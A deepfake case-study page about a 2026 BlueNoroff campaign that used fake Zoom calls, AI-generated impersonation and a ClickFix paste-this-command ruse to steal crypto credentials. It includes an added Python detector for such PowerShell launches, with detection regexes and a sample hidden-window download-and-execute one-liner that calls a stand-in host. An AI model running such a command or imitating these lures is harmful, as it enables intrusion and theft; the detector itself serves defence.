Detect Deepfakes by Resemble AI
Deepfake case study · Video

How AI Is Being Used to Drain Crypto Wallets (Deepfakes, Fake Calls and Recovery Scams)

North Korean hackers used AI deepfakes and fake Zoom calls to compromise over 100 Web3 executives in a sophisticated credential theft operation

Incident date
Jan 2026
Target
Web3 executives
Updated Jul 4, 2026 · 1 min read

On January 23, 2026, North Korean threat group BlueNoroff successfully breached a North American Web3 company using a sophisticated campaign involving fake Zoom calls and AI-generated deepfakes. The attackers maintained quiet access to the target's systems for 66 days, part of a wider operation that compromised more than 100 executives across 20 countries.

What happened

The attack began with a deceptive Calendly invitation sent by an actor posing as a fintech lawyer. The invite included a typo-squatted Zoom link designed to mimic a legitimate meeting platform. Once the target joined the call, they were prompted to perform a fake Zoom SDK update via a "ClickFix" ruse. By copying and pasting the provided commands, the victim unknowingly executed a fileless PowerShell payload that granted the attackers immediate access to browser logins, crypto wallet data, and active Telegram sessions.
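
The ClickFix step above hinges on a user pasting an attacker-supplied command into the Run dialog or a terminal, so the process-creation event it produces looks unlike routine administration. The following is an added example of a heuristic detector for that pattern (not code from the case or from Resemble AI); the indicator set, the parent-process list and the two sample events are assumptions, since the page does not quote the real commands.

```python
# Added heuristic detector for ClickFix-style PowerShell launches in process-creation
# telemetry. Indicator choices and sample events are assumptions, not data from the case.
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    parent: str    # parent process image name
    image: str     # launched process image name
    cmdline: str   # full command line as logged

# Processes a user lands in when pasting a "fix": the Run dialog (explorer.exe) or a terminal.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
IN_MEMORY_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
REMOTE_FETCH = re.compile(r"\b(?:downloadstring|invoke-webrequest|iwr|invoke-restmethod|irm)\b", re.I)

def clickfix_indicators(ev: ProcessEvent) -> list:
    """Return the ClickFix-style indicators present in one process-creation event."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    found = []
    if ev.parent.lower() in INTERACTIVE_PARENTS:
        found.append("powershell started from Run dialog or terminal")
    if HIDDEN_WINDOW.search(ev.cmdline):
        found.append("hidden window requested")
    if ENCODED_CMD.search(ev.cmdline):
        found.append("base64-encoded command")
    if IN_MEMORY_EXEC.search(ev.cmdline) and REMOTE_FETCH.search(ev.cmdline):
        found.append("download-and-execute cradle (fileless)")
    return found

def is_clickfix_like(ev: ProcessEvent, min_indicators: int = 2) -> bool:
    """Flag an event only when several indicators coincide, to spare routine admin scripts."""
    return len(clickfix_indicators(ev)) >= min_indicators

# Constructed sample events (hypothetical; the page does not quote the real commands).
SAMPLE_EVENTS = [
    ProcessEvent("svchost.exe", "powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (iwr https://zoom-sdk-update.example/fix).Content"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_like(ev), clickfix_indicators(ev))
```

The scheduled-task style script in the first event yields no indicators, while the pasted one-liner in the second trips three at once; raising `min_indicators` trades recall for fewer alerts on legitimate hidden-window scripts.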

To maintain credibility during these interactions, the hackers used a library of deepfake content. This included stolen webcam footage, AI-generated headshots, and composite video of prior victims. Investigators determined that these synthetic assets were generated using OpenAI's GPT-4o model. The campaign functioned as a self-reinforcing cycle: by compromising one victim, the attackers gained access to their contacts and identity, which they then used to impersonate trusted individuals and lure the next wave of targets. Approximately 80% of those targeted held roles in crypto or blockchain finance, with founders and chief executives representing nearly half of the victims. The operation was traced back to the BlueNoroff group, a financially motivated arm of the Lazarus Group, after researchers discovered metadata linked to a macOS username "king" within the deepfake files.

Sources